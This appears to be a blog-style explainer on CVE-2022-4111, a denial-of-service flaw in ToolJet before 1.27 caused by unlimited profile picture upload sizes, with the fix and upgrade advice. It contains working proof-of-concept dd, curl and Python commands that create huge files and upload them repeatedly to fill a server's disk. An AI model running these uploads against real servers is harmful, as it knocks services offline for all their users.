ToolJet is a popular open-source platform for building custom business applications. Like many web apps, it offers users the option to upload profile pictures. However, in versions before 1.27, there is an important security vulnerability: there’s no limit on the size of profile picture uploads. This flaw—assigned CVE-2022-4111—can allow any logged in user to upload huge files. Over time, this can fill up the server’s disk space, causing ToolJet and possibly the whole server to crash (Denial of Service, or DoS).
Let’s break down what this means, explore the exploit details, share a code example, and highlight how it was addressed.
What is CVE-2022-4111?
- Affected Product: ToolJet
Official Reference
- NVD CVE-2022-4111 Page
- GitHub Advisory ToolJet/tooljet#2331
- Original Patch Pull Request
Vulnerability Details
When a user uploads a profile picture, the application calls an endpoint that receives the file and saves it—without checking how big the file is. There are no limits on file type, count, or size.
Problem:
If an attacker uploads a huge file (or does this repeatedly), the server’s disk can fill up. When the disk is full, ToolJet can no longer save data, logs, or even run; it crashes or hangs—resulting in Denial of Service.
Go to the profile picture upload page.
3. Use a tool like curl or Postman (or just the browser) to upload an extremely large file (e.g., 100 MB, 1 GB, or more).
Repeat this upload until the server is out of space.
Real Impact:
All users are affected—no one can log in or use the service until manual intervention.
- In cloud environments, this attack can exhaust storage quotas and may trigger suspension of resources.
Proof-of-Concept (PoC) Code
Here’s a simple curl command to upload a large file as a profile picture on an affected ToolJet instance (replace <URL> and <TOKEN>):
# Generate a random 100MB file
dd if=/dev/urandom of=bigfile.jpg bs=1M count=100
# Use your session or JWT token here
curl -X POST <TOOLJET_SERVER>/api/users/profile-picture \
-H "Authorization: Bearer <TOKEN>" \
-F "profile_picture=@bigfile.jpg"
Or, using Python’s requests library
import requests
token = "<TOKEN>"
url = "<TOOLJET_SERVER>/api/users/profile-picture"
headers = {"Authorization": f"Bearer {token}"}
with open("bigfile.jpg", "rb") as pic:
files = {"profile_picture": pic}
r = requests.post(url, files=files, headers=headers)
print(r.status_code, r.text)
Note:
Swap <TOOLJET_SERVER> with your actual ToolJet server address.
- To create a huge file on Linux/macOS:
dd if=/dev/zero of=bigfile.jpg bs=5M count=200 (produces a 1GB file).
repeating this attack (or using multiple accounts) can fill up the server disk.
- ToolJet stops working, and may make other services on the host inoperative, until someone deletes files and restarts the service.
Remediation and Patch
The fix (merged in ToolJet 1.27) adds a file size check. Now, profile pictures over 2MB are rejected with an error.
- View the Patch
- Release Notes
Example of the patched code (pseudocode)
if (file.size > 2 * 1024 * 1024) { // 2MB limit
return res.status(400).send("File too large");
}
Admins:
Upgrade to ToolJet 1.27. or newer ASAP.
- Optionally, add operating-system or infrastructure limits on file uploads (e.g., using nginx, cloud bucket quotas, or file system permissions).
Conclusion & Lessons Learned
CVE-2022-4111 is a classic example of “small bug, big effect.” Even seemingly safe features like avatar uploads can open the doors to denial-of-service if limits aren’t enforced.
Key Takeaways
- Always validate file type AND file size on every upload route—servers should NEVER trust the client.
References
- NVD Detail: CVE-2022-4111
- ToolJet GitHub Security Advisory
- ToolJet Patch Pull Request
- ToolJet Release 1.27.
If you use ToolJet, check your version and update immediately to stay secure!
Timeline
Published on: 11/22/2022 03:15:00 UTC
Last modified on: 11/26/2022 03:28:00 UTC